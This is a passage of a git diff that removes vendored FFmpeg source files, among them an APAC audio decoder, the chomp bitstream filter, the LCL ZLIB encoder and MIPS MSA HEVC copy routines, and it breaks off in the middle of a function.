av_realloc_f(s->bitstream, s->max_framesize + AV_INPUT_BUFFER_PADDING_SIZE, sizeof(*s->bitstream)); - if (!s->bitstream) - return AVERROR(ENOMEM); - - return 0; -} - -static int get_code(ChContext *c, GetBitContext *gb) -{ - if (get_bits1(gb)) { - int code = get_bits(gb, 2); - - switch (code) { - case 0: - c->bit_length--; - break; - case 1: - c->bit_length++; - break; - case 2: - c->bit_length = get_bits(gb, 5); - break; - case 3: - c->block_length = get_bits(gb, 4); - return 1; - } - } - - return 0; -} - -static int apac_decode(AVCodecContext *avctx, AVFrame *frame, - int *got_frame_ptr, AVPacket *pkt) -{ - APACContext *s = avctx->priv_data; - GetBitContext *gb = &s->gb; - int ret, n, buf_size, input_buf_size; - const uint8_t *buf; - int nb_samples; - - if (!pkt->size && s->bitstream_size <= 0) { - *got_frame_ptr = 0; - return 0; - } - - buf_size = pkt->size; - input_buf_size = buf_size; - - if (s->bitstream_index > 0 && s->bitstream_size > 0) { - memmove(s->bitstream, &s->bitstream[s->bitstream_index], s->bitstream_size); - s->bitstream_index = 0; - } - - if (s->bitstream_index + s->bitstream_size + buf_size > s->max_framesize) { - s->bitstream = av_realloc_f(s->bitstream, s->bitstream_index + - s->bitstream_size + - buf_size + AV_INPUT_BUFFER_PADDING_SIZE, - sizeof(*s->bitstream)); - if (!s->bitstream) - return AVERROR(ENOMEM); - s->max_framesize = s->bitstream_index + s->bitstream_size + buf_size; - } - if (pkt->data) - memcpy(&s->bitstream[s->bitstream_index + s->bitstream_size], pkt->data, buf_size); - buf = &s->bitstream[s->bitstream_index]; - buf_size += s->bitstream_size; - s->bitstream_size = buf_size; - - frame->nb_samples = s->bitstream_size * 16 * 8; - if 
((ret = ff_get_buffer(avctx, frame, 0)) < 0) - return ret; - - if ((ret = init_get_bits8(gb, buf, buf_size)) < 0) - return ret; - - skip_bits(gb, s->skip); - s->skip = 0; - - while (get_bits_left(gb) > 0) { - for (int ch = s->cur_ch; ch < avctx->ch_layout.nb_channels; ch++) { - ChContext *c = &s->ch[ch]; - int16_t *dst16 = (int16_t *)c->block; - uint8_t *dst8 = (uint8_t *)c->block; - void *samples[4]; - - samples[0] = &c->block[0]; - if (get_bits_left(gb) < 16 && pkt->size) { - s->cur_ch = ch; - goto end; - } - - if (!c->have_code && get_code(c, gb)) - get_code(c, gb); - c->have_code = 0; - - if (c->block_length <= 0) - continue; - - if (c->bit_length < 0 || - c->bit_length > 17) { - c->bit_length = avctx->bits_per_coded_sample; - s->bitstream_index = 0; - s->bitstream_size = 0; - return AVERROR_INVALIDDATA; - } - - if (get_bits_left(gb) < c->block_length * c->bit_length) { - if (pkt->size) { - c->have_code = 1; - s->cur_ch = ch; - goto end; - } else { - break; - } - } - - for (int i = 0; i < c->block_length; i++) { - int val = get_bits_long(gb, c->bit_length); - unsigned delta = (val & 1) ? ~(val >> 1) : (val >> 1); - int sample; - - delta += c->last_delta; - sample = c->last_sample + delta; - c->last_delta = delta; - c->last_sample = sample; - - switch (avctx->sample_fmt) { - case AV_SAMPLE_FMT_S16P: - dst16[i] = sample; - break; - case AV_SAMPLE_FMT_U8P: - dst8[i] = sample; - break; - } - } - - av_audio_fifo_write(c->samples, samples, c->block_length); - } - - s->cur_ch = 0; - } -end: - nb_samples = frame->nb_samples; - for (int ch = 0; ch < avctx->ch_layout.nb_channels; ch++) - nb_samples = FFMIN(av_audio_fifo_size(s->ch[ch].samples), nb_samples); - - frame->nb_samples = nb_samples; - for (int ch = 0; ch < avctx->ch_layout.nb_channels; ch++) { - void *samples[1] = { frame->extended_data[ch] }; - av_audio_fifo_read(s->ch[ch].samples, samples, nb_samples); - } - - s->skip = get_bits_count(gb) - 8 * (get_bits_count(gb) / 8); - n = get_bits_count(gb) / 8; - - if (nb_samples > 0 || pkt->size) - *got_frame_ptr = 1; - - if (s->bitstream_size > 0) { - s->bitstream_index += n; - s->bitstream_size -= n; - return input_buf_size; - } - return n; -} - -const FFCodec ff_apac_decoder = { - .p.name = "apac", - CODEC_LONG_NAME("Marian's A-pac audio"), - .p.type = AVMEDIA_TYPE_AUDIO, - .p.id = AV_CODEC_ID_APAC, - .priv_data_size = sizeof(APACContext), - .init = apac_init, - FF_CODEC_DECODE_CB(apac_decode), - .close = apac_close, - .p.capabilities = AV_CODEC_CAP_DELAY | - AV_CODEC_CAP_DR1 | - AV_CODEC_CAP_SUBFRAMES, - .caps_internal = FF_CODEC_CAP_INIT_CLEANUP, - .p.sample_fmts = (const enum AVSampleFormat[]) { AV_SAMPLE_FMT_U8P, - AV_SAMPLE_FMT_S16P, - AV_SAMPLE_FMT_NONE }, -}; diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/chomp_bsf.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/chomp_bsf.c deleted file mode 100644 index 532b4e6a94f6be000e99508956389d652399c7ee..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/chomp_bsf.c +++ /dev/null @@ -1,45 +0,0 @@ -/* - * Chomp bitstream filter - * Copyright (c) 2010 Alex Converse - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. 
- * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#include "bsf.h" -#include "bsf_internal.h" - -static int chomp_filter(AVBSFContext *ctx, AVPacket *pkt) -{ - int ret; - - ret = ff_bsf_get_packet_ref(ctx, pkt); - if (ret < 0) - return ret; - - while (pkt->size > 0 && !pkt->data[pkt->size - 1]) - pkt->size--; - - return 0; -} - -/** - * This filter removes a string of NULL bytes from the end of a packet. - */ -const FFBitStreamFilter ff_chomp_bsf = { - .p.name = "chomp", - .filter = chomp_filter, -}; diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/lclenc.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/lclenc.c deleted file mode 100644 index dd5eed9d63cf971578094beefee76d07d67e1d57..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/lclenc.c +++ /dev/null @@ -1,167 +0,0 @@ -/* - * LCL (LossLess Codec Library) Codec - * Copyright (c) 2002-2004 Roberto Togni - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. 
- * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -/** - * @file - * LCL (LossLess Codec Library) Video Codec - * Decoder for MSZH and ZLIB codecs - * Experimental encoder for ZLIB RGB24 - * - * Fourcc: MSZH, ZLIB - * - * Original Win32 dll: - * Ver2.23 By Kenji Oshima 2000.09.20 - * avimszh.dll, avizlib.dll - * - * A description of the decoding algorithm can be found here: - * http://www.pcisys.net/~melanson/codecs - * - * Supports: BGR24 (RGB 24bpp) - */ - -#include -#include - -#include "libavutil/avassert.h" -#include "avcodec.h" -#include "codec_internal.h" -#include "encode.h" -#include "lcl.h" -#include "zlib_wrapper.h" -#include "libavutil/internal.h" -#include "libavutil/mem.h" - -#include - -typedef struct LclEncContext { - - AVCodecContext *avctx; - - // Image type - int imgtype; - // Compression type - int compression; - // Flags - int flags; - FFZStream zstream; -} LclEncContext; - -static int encode_frame(AVCodecContext *avctx, AVPacket *pkt, - const AVFrame *p, int *got_packet) -{ - LclEncContext *c = avctx->priv_data; - z_stream *const zstream = &c->zstream.zstream; - int i, ret; - int zret; // Zlib return code - int max_size = deflateBound(zstream, avctx->width * avctx->height * 3); - - if ((ret = ff_alloc_packet(avctx, pkt, max_size)) < 0) - return ret; - - if(avctx->pix_fmt != AV_PIX_FMT_BGR24){ - av_log(avctx, AV_LOG_ERROR, "Format not supported!\n"); - return -1; - } - - zret = deflateReset(zstream); - if (zret != Z_OK) { - av_log(avctx, AV_LOG_ERROR, "Deflate reset error: %d\n", zret); - return -1; - } - zstream->next_out = pkt->data; - zstream->avail_out = pkt->size; - - for(i = avctx->height - 1; i >= 0; i--) { - zstream->next_in = p->data[0] + p->linesize[0] * i; - zstream->avail_in = avctx->width * 3; - zret = deflate(zstream, Z_NO_FLUSH); - if (zret != Z_OK) { - av_log(avctx, AV_LOG_ERROR, "Deflate error: %d\n", zret); - return -1; - } - } - zret = deflate(zstream, Z_FINISH); - if (zret != Z_STREAM_END) { - av_log(avctx, AV_LOG_ERROR, "Deflate error: %d\n", zret); - return -1; - } - - pkt->size = zstream->total_out; - *got_packet = 1; - - return 0; -} - -static av_cold int encode_init(AVCodecContext *avctx) -{ - LclEncContext *c = avctx->priv_data; - - c->avctx= avctx; - - av_assert0(avctx->width && avctx->height); - - avctx->extradata = av_mallocz(8 + AV_INPUT_BUFFER_PADDING_SIZE); - if (!avctx->extradata) - return AVERROR(ENOMEM); - - c->compression = avctx->compression_level == FF_COMPRESSION_DEFAULT ? 
- COMP_ZLIB_NORMAL : - av_clip(avctx->compression_level, 0, 9); - c->flags = 0; - c->imgtype = IMGTYPE_RGB24; - avctx->bits_per_coded_sample= 24; - - avctx->extradata[0]= 4; - avctx->extradata[1]= 0; - avctx->extradata[2]= 0; - avctx->extradata[3]= 0; - avctx->extradata[4]= c->imgtype; - avctx->extradata[5]= c->compression; - avctx->extradata[6]= c->flags; - avctx->extradata[7]= CODEC_ZLIB; - c->avctx->extradata_size= 8; - - return ff_deflate_init(&c->zstream, c->compression, avctx); -} - -static av_cold int encode_end(AVCodecContext *avctx) -{ - LclEncContext *c = avctx->priv_data; - - ff_deflate_end(&c->zstream); - - return 0; -} - -const FFCodec ff_zlib_encoder = { - .p.name = "zlib", - CODEC_LONG_NAME("LCL (LossLess Codec Library) ZLIB"), - .p.type = AVMEDIA_TYPE_VIDEO, - .p.id = AV_CODEC_ID_ZLIB, - .p.capabilities = AV_CODEC_CAP_DR1 | AV_CODEC_CAP_FRAME_THREADS | - AV_CODEC_CAP_ENCODER_REORDERED_OPAQUE, - .priv_data_size = sizeof(LclEncContext), - .init = encode_init, - FF_CODEC_ENCODE_CB(encode_frame), - .close = encode_end, - .p.pix_fmts = (const enum AVPixelFormat[]) { AV_PIX_FMT_BGR24, AV_PIX_FMT_NONE }, - .caps_internal = FF_CODEC_CAP_INIT_CLEANUP, -}; diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/mips/hevcdsp_msa.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/mips/hevcdsp_msa.c deleted file mode 100644 index 9c12029c1f577cff03c2da9d31882c69fb4b4761..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/mips/hevcdsp_msa.c +++ /dev/null @@ -1,4400 +0,0 @@ -/* - * Copyright (c) 2015 - 2017 Manojkumar Bhosale (Manojkumar.Bhosale@imgtec.com) - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. 
- * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#include "libavutil/mips/generic_macros_msa.h" -#include "libavcodec/mips/hevcdsp_mips.h" -#include "libavcodec/mips/hevc_macros_msa.h" - -static const uint8_t ff_hevc_mask_arr[16 * 2] __attribute__((aligned(0x40))) = { - /* 8 width cases */ - 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, - /* 4 width cases */ - 0, 1, 1, 2, 2, 3, 3, 4, 16, 17, 17, 18, 18, 19, 19, 20 -}; - -static void hevc_copy_4w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - int32_t height) -{ - v16i8 zero = { 0 }; - - if (2 == height) { - v16i8 src0, src1; - v8i16 in0; - - LD_SB2(src, src_stride, src0, src1); - - src0 = (v16i8) __msa_ilvr_w((v4i32) src1, (v4i32) src0); - in0 = (v8i16) __msa_ilvr_b(zero, src0); - in0 <<= 6; - ST_D2(in0, 0, 1, dst, dst_stride); - } else if (4 == height) { - v16i8 src0, src1, src2, src3; - v8i16 in0, in1; - - LD_SB4(src, src_stride, src0, src1, src2, src3); - - ILVR_W2_SB(src1, src0, src3, src2, src0, src1); - ILVR_B2_SH(zero, src0, zero, src1, in0, in1); - in0 <<= 6; - in1 <<= 6; - ST_D4(in0, in1, 0, 1, 0, 1, dst, dst_stride); - } else if (0 == height % 8) { - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 in0, in1, in2, in3; - uint32_t loop_cnt; - - for (loop_cnt = (height >> 3); loop_cnt--;) { - LD_SB8(src, src_stride, - src0, src1, src2, src3, src4, src5, src6, src7); - src += (8 * src_stride); - - ILVR_W4_SB(src1, src0, src3, src2, src5, src4, src7, src6, - src0, src1, src2, src3); - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0, in1, in2, in3); - SLLI_4V(in0, in1, in2, in3, 6); - ST_D8(in0, in1, in2, in3, 0, 1, 0, 1, 0, 1, 0, 1, dst, dst_stride); - dst += (8 * dst_stride); - } - } -} - -static void hevc_copy_6w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - int32_t height) -{ - uint32_t loop_cnt = (height >> 3); - uint32_t res = height & 0x07; - v16i8 zero = { 0 }; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 in0, in1, in2, in3, in4, in5, in6, in7; - - for (; loop_cnt--; ) { - LD_SB8(src, src_stride, src0, src1, src2, src3, src4, src5, src6, src7); - src += (8 * src_stride); - - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0, in1, in2, in3); - ILVR_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, - in4, in5, in6, in7); - SLLI_4V(in0, in1, in2, in3, 6); - SLLI_4V(in4, in5, in6, in7, 6); - ST12x8_UB(in0, in1, in2, in3, in4, in5, in6, in7, dst, 2 * dst_stride); - dst += (8 * dst_stride); - } - for (; res--; ) { - uint64_t out0; - uint32_t out1; - src0 = LD_SB(src); - src += src_stride; - in0 = (v8i16)__msa_ilvr_b((v16i8) zero, (v16i8) src0); - in0 = in0 << 6; - out0 = __msa_copy_u_d((v2i64) in0, 0); - out1 = __msa_copy_u_w((v4i32) in0, 2); - SD(out0, dst); - SW(out1, dst + 4); - dst += dst_stride; - } -} - -static void hevc_copy_8w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - int32_t height) -{ - v16i8 zero = { 0 }; - - if (2 == height) { - v16i8 src0, src1; - v8i16 in0, in1; - - LD_SB2(src, src_stride, src0, src1); - - ILVR_B2_SH(zero, src0, zero, src1, in0, in1); - in0 <<= 6; - in1 <<= 6; - ST_SH2(in0, in1, dst, dst_stride); - } else if (4 == height) { - v16i8 src0, src1, src2, src3; - v8i16 in0, in1, in2, in3; - - LD_SB4(src, src_stride, src0, src1, src2, src3); - - 
ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0, in1, in2, in3); - SLLI_4V(in0, in1, in2, in3, 6); - ST_SH4(in0, in1, in2, in3, dst, dst_stride); - } else if (6 == height) { - v16i8 src0, src1, src2, src3, src4, src5; - v8i16 in0, in1, in2, in3, in4, in5; - - LD_SB6(src, src_stride, src0, src1, src2, src3, src4, src5); - - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0, in1, in2, in3); - ILVR_B2_SH(zero, src4, zero, src5, in4, in5); - SLLI_4V(in0, in1, in2, in3, 6); - in4 <<= 6; - in5 <<= 6; - ST_SH6(in0, in1, in2, in3, in4, in5, dst, dst_stride); - } else if (0 == height % 8) { - uint32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 in0, in1, in2, in3, in4, in5, in6, in7; - - for (loop_cnt = (height >> 3); loop_cnt--;) { - LD_SB8(src, src_stride, - src0, src1, src2, src3, src4, src5, src6, src7); - src += (8 * src_stride); - - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0, in1, in2, in3); - ILVR_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, - in4, in5, in6, in7); - SLLI_4V(in0, in1, in2, in3, 6); - SLLI_4V(in4, in5, in6, in7, 6); - ST_SH8(in0, in1, in2, in3, in4, in5, in6, in7, dst, dst_stride); - dst += (8 * dst_stride); - } - } -} - -static void hevc_copy_12w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - int32_t height) -{ - uint32_t loop_cnt; - uint32_t res = height & 0x07; - v16i8 zero = { 0 }; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 in0, in1, in0_r, in1_r, in2_r, in3_r; - - for (loop_cnt = (height >> 3); loop_cnt--;) { - LD_SB8(src, src_stride, src0, src1, src2, src3, src4, src5, src6, src7); - src += (8 * src_stride); - - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0_r, in1_r, in2_r, in3_r); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - ILVL_W2_SB(src1, src0, src3, src2, src0, src1); - ILVR_B2_SH(zero, src0, zero, src1, in0, in1); - in0 <<= 6; - in1 <<= 6; - ST_SH4(in0_r, in1_r, in2_r, in3_r, dst, dst_stride); - ST_D4(in0, in1, 0, 1, 0, 1, dst + 8, dst_stride); - dst += (4 * dst_stride); - - ILVR_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, - in0_r, in1_r, in2_r, in3_r); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - ILVL_W2_SB(src5, src4, src7, src6, src0, src1); - ILVR_B2_SH(zero, src0, zero, src1, in0, in1); - in0 <<= 6; - in1 <<= 6; - ST_SH4(in0_r, in1_r, in2_r, in3_r, dst, dst_stride); - ST_D4(in0, in1, 0, 1, 0, 1, dst + 8, dst_stride); - dst += (4 * dst_stride); - } - for (; res--; ) { - uint64_t out0; - src0 = LD_SB(src); - src += src_stride; - in0_r = (v8i16)__msa_ilvr_b((v16i8) zero, (v16i8) src0); - in0 = (v8i16)__msa_ilvl_b((v16i8) zero, (v16i8) src0); - in0_r = in0_r << 6; - in0 = in0 << 6; - ST_UH(in0_r, dst); - out0 = __msa_copy_u_d((v2i64) in0, 0); - SD(out0, dst + 8); - dst += dst_stride; - } -} - -static void hevc_copy_16w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - int32_t height) -{ - v16i8 zero = { 0 }; - - if (4 == height) { - v16i8 src0, src1, src2, src3; - v8i16 in0_r, in1_r, in2_r, in3_r; - v8i16 in0_l, in1_l, in2_l, in3_l; - - LD_SB4(src, src_stride, src0, src1, src2, src3); - - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0_r, in1_r, in2_r, in3_r); - ILVL_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0_l, in1_l, in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in1_r, in2_r, in3_r, dst, dst_stride); - ST_SH4(in0_l, in1_l, in2_l, in3_l, (dst + 8), 
dst_stride); - } else if (12 == height) { - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v16i8 src8, src9, src10, src11; - v8i16 in0_r, in1_r, in2_r, in3_r; - v8i16 in0_l, in1_l, in2_l, in3_l; - - LD_SB8(src, src_stride, src0, src1, src2, src3, src4, src5, src6, src7); - src += (8 * src_stride); - LD_SB4(src, src_stride, src8, src9, src10, src11); - - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0_r, in1_r, in2_r, in3_r); - ILVL_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0_l, in1_l, in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in1_r, in2_r, in3_r, dst, dst_stride); - ST_SH4(in0_l, in1_l, in2_l, in3_l, (dst + 8), dst_stride); - dst += (4 * dst_stride); - - ILVR_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, - in0_r, in1_r, in2_r, in3_r); - ILVL_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, - in0_l, in1_l, in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in1_r, in2_r, in3_r, dst, dst_stride); - ST_SH4(in0_l, in1_l, in2_l, in3_l, (dst + 8), dst_stride); - dst += (4 * dst_stride); - - ILVR_B4_SH(zero, src8, zero, src9, zero, src10, zero, src11, - in0_r, in1_r, in2_r, in3_r); - ILVL_B4_SH(zero, src8, zero, src9, zero, src10, zero, src11, - in0_l, in1_l, in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in1_r, in2_r, in3_r, dst, dst_stride); - ST_SH4(in0_l, in1_l, in2_l, in3_l, (dst + 8), dst_stride); - } else if (0 == (height % 8)) { - uint32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 in0_r, in1_r, in2_r, in3_r, in0_l, in1_l, in2_l, in3_l; - - for (loop_cnt = (height >> 3); loop_cnt--;) { - LD_SB8(src, src_stride, src0, src1, src2, src3, src4, src5, src6, - src7); - src += (8 * src_stride); - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, in0_r, - in1_r, in2_r, in3_r); - ILVL_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, in0_l, - in1_l, in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in1_r, in2_r, in3_r, dst, dst_stride); - ST_SH4(in0_l, in1_l, in2_l, in3_l, (dst + 8), dst_stride); - dst += (4 * dst_stride); - - ILVR_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, in0_r, - in1_r, in2_r, in3_r); - ILVL_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, in0_l, - in1_l, in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in1_r, in2_r, in3_r, dst, dst_stride); - ST_SH4(in0_l, in1_l, in2_l, in3_l, (dst + 8), dst_stride); - dst += (4 * dst_stride); - } - } -} - -static void hevc_copy_24w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - int32_t height) -{ - uint32_t loop_cnt; - v16i8 zero = { 0 }; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 in0_r, in1_r, in2_r, in3_r, in0_l, in1_l, in2_l, in3_l; - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB4(src, src_stride, src0, src1, src2, src3); - LD_SB4((src + 16), src_stride, src4, src5, src6, src7); - src += (4 * src_stride); - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, in0_r, in1_r, - in2_r, in3_r); - ILVL_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, in0_l, in1_l, - in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in1_r, in2_r, in3_r, dst, dst_stride); - 
ST_SH4(in0_l, in1_l, in2_l, in3_l, (dst + 8), dst_stride); - ILVR_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, in0_r, in1_r, - in2_r, in3_r); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - ST_SH4(in0_r, in1_r, in2_r, in3_r, (dst + 16), dst_stride); - dst += (4 * dst_stride); - } -} - -static void hevc_copy_32w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - int32_t height) -{ - uint32_t loop_cnt; - v16i8 zero = { 0 }; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 in0_r, in1_r, in2_r, in3_r, in0_l, in1_l, in2_l, in3_l; - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB4(src, src_stride, src0, src2, src4, src6); - LD_SB4((src + 16), src_stride, src1, src3, src5, src7); - src += (4 * src_stride); - - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, in0_r, in1_r, - in2_r, in3_r); - ILVL_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, in0_l, in1_l, - in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in0_l, in1_r, in1_l, dst, 8); - dst += dst_stride; - ST_SH4(in2_r, in2_l, in3_r, in3_l, dst, 8); - dst += dst_stride; - - ILVR_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, in0_r, in1_r, - in2_r, in3_r); - ILVL_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, in0_l, in1_l, - in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in0_l, in1_r, in1_l, dst, 8); - dst += dst_stride; - ST_SH4(in2_r, in2_l, in3_r, in3_l, dst, 8); - dst += dst_stride; - } -} - -static void hevc_copy_48w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - int32_t height) -{ - uint32_t loop_cnt; - v16i8 zero = { 0 }; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v16i8 src8, src9, src10, src11; - v8i16 in0_r, in1_r, in2_r, in3_r, in4_r, in5_r; - v8i16 in0_l, in1_l, in2_l, in3_l, in4_l, in5_l; - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB3(src, 16, src0, src1, src2); - src += src_stride; - LD_SB3(src, 16, src3, src4, src5); - src += src_stride; - LD_SB3(src, 16, src6, src7, src8); - src += src_stride; - LD_SB3(src, 16, src9, src10, src11); - src += src_stride; - - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0_r, in1_r, in2_r, in3_r); - ILVL_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0_l, in1_l, in2_l, in3_l); - ILVR_B2_SH(zero, src4, zero, src5, in4_r, in5_r); - ILVL_B2_SH(zero, src4, zero, src5, in4_l, in5_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - SLLI_4V(in4_r, in5_r, in4_l, in5_l, 6); - ST_SH6(in0_r, in0_l, in1_r, in1_l, in2_r, in2_l, dst, 8); - dst += dst_stride; - ST_SH6(in3_r, in3_l, in4_r, in4_l, in5_r, in5_l, dst, 8); - dst += dst_stride; - - ILVR_B4_SH(zero, src6, zero, src7, zero, src8, zero, src9, - in0_r, in1_r, in2_r, in3_r); - ILVL_B4_SH(zero, src6, zero, src7, zero, src8, zero, src9, - in0_l, in1_l, in2_l, in3_l); - ILVR_B2_SH(zero, src10, zero, src11, in4_r, in5_r); - ILVL_B2_SH(zero, src10, zero, src11, in4_l, in5_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - SLLI_4V(in4_r, in5_r, in4_l, in5_l, 6); - ST_SH6(in0_r, in0_l, in1_r, in1_l, in2_r, in2_l, dst, 8); - dst += dst_stride; - ST_SH6(in3_r, in3_l, in4_r, in4_l, in5_r, in5_l, dst, 8); - dst += dst_stride; - } -} - -static void hevc_copy_64w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - int32_t height) -{ - uint32_t loop_cnt; - 
